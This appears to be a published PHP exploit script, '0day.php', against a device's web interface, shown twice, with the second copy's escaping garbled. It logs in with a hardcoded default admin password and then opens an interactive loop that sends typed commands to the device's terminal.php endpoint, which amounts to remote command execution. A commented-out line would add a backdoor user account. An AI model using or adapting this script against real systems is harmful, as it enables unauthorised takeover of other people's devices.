numanturle/0day.php

## 0day.php
<?php
function anim($msg, $time)
{
    $msg = str_split($msg);
    foreach ($msg as $ms) {
        echo $ms;
        usleep($time);
    }
}
anim("
   ___      _
  / _ \    | |
 | | | | __| | __ _ _   _
 | | | |/ _` |/ _` | | | |
 | |_| | (_| | (_| | |_| |
  \___/ \__,_|\__,_|\__, |
                     __/ |
  __  __  ____  ____|___/____ _        __  ____   ____  ___   ___
 |  \/  |/ __ \|  __ \|  ____| |      |  \/  \ \ / /_ |/ _ \ / _ \
 | \  / | |  | | |  | | |__  | |      | \  / |\ V / | | | | | | | |
 | |\/| | |  | | |  | |  __| | |      | |\/| | > <  | | | | | | | |
 | |  | | |__| | |__| | |____| |____  | |  | |/ . \ | | |_| | |_| |
 |_|  |_|\____/|_____/|______|______| |_|  |_/_/ \_\|_|\___/ \___/

", 900);
echo PHP_EOL;

echo anim("Target : ", 800);
$hedef = trim(fgets(STDIN));
echo PHP_EOL;

// create backdor
#$baglan = file_get_contents($argv[1] . "/modules/users/data_users.php?job=add_user&custom_username={$uret}&custom_password={$uret}&custom_password_confirm={$uret}&custom_profile=all&custom_mlogin=&custom_status=enabled");

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, trim($hedef));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.dat");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.dat");

curl_setopt($ch, CURLOPT_POSTFIELDS,
    "username=admin&password=moiwi&submit=");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$server_output = curl_exec($ch);
curl_close($ch);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, trim($hedef) . "/index.php");
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.dat");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.dat");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$server_output = curl_exec($ch);
curl_close($ch);

while (1) {
    echo anim("Command : ", 800);
    $komut = trim(fgets(STDIN));
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, trim($hedef) . "/tools/terminal.php");
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.dat");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.dat");

    curl_setopt($ch, CURLOPT_POSTFIELDS,
        "persist_command_id=&command=" . urlencode(trim($komut)));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    $server_output = curl_exec($ch);

    curl_close($ch);
    preg_match_all('@<pre>(.*?)</pre>@si', $server_output, $ciktilar);
    echo end($ciktilar[1]);
}
	<?php
	function anim($msg, $time)
	{
	$msg = str_split($msg);
	foreach ($msg as $ms) {
	echo $ms;
	usleep($time);
	}
	}
	anim("
	___ _
	/ _ \ \| \|
	\| \| \| \| __\| \| __ _ _ _
	\| \| \| \|/ _` \|/ _` \| \| \| \|
	\| \|_\| \| (_\| \| (_\| \| \|_\| \|
	\___/ \__,_\|\__,_\|\__, \|
	__/ \|
	__ __ ____ ____\|___/____ _ __ ____ ____ ___ ___
	\| \/ \|/ __ \\| __ \\| ____\| \| \| \/ \ \ / /_ \|/ _ \ / _ \
	\| \ / \| \| \| \| \| \| \| \|__ \| \| \| \ / \|\ V / \| \| \| \| \| \| \| \|
	\| \|\/\| \| \| \| \| \| \| \| __\| \| \| \| \|\/\| \| > < \| \| \| \| \| \| \| \|
	\| \| \| \| \|__\| \| \|__\| \| \|____\| \|____ \| \| \| \|/ . \ \| \| \|_\| \| \|_\| \|
	\|_\| \|_\|\____/\|_____/\|______\|______\| \|_\| \|_/_/ \_\\|_\|\___/ \___/

	", 900);
	echo PHP_EOL;

	echo anim("Target : ", 800);
	$hedef = trim(fgets(STDIN));
	echo PHP_EOL;

	// create backdor
	#$baglan = file_get_contents($argv[1] . "/modules/users/data_users.php?job=add_user&custom_username={$uret}&custom_password={$uret}&custom_password_confirm={$uret}&custom_profile=all&custom_mlogin=&custom_status=enabled");

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, trim($hedef));
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_COOKIESESSION, true);
	curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.dat");
	curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.dat");

	curl_setopt($ch, CURLOPT_POSTFIELDS,
	"username=admin&password=moiwi&submit=");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$server_output = curl_exec($ch);
	curl_close($ch);

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, trim($hedef) . "/index.php");
	curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.dat");
	curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.dat");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$server_output = curl_exec($ch);
	curl_close($ch);

	while (1) {
	echo anim("Command : ", 800);
	$komut = trim(fgets(STDIN));
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, trim($hedef) . "/tools/terminal.php");
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.dat");
	curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.dat");

	curl_setopt($ch, CURLOPT_POSTFIELDS,
	"persist_command_id=&command=" . urlencode(trim($komut)));
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

	$server_output = curl_exec($ch);

	curl_close($ch);
	preg_match_all('@<pre>(.*?)</pre>@si', $server_output, $ciktilar);
	echo end($ciktilar[1]);
	}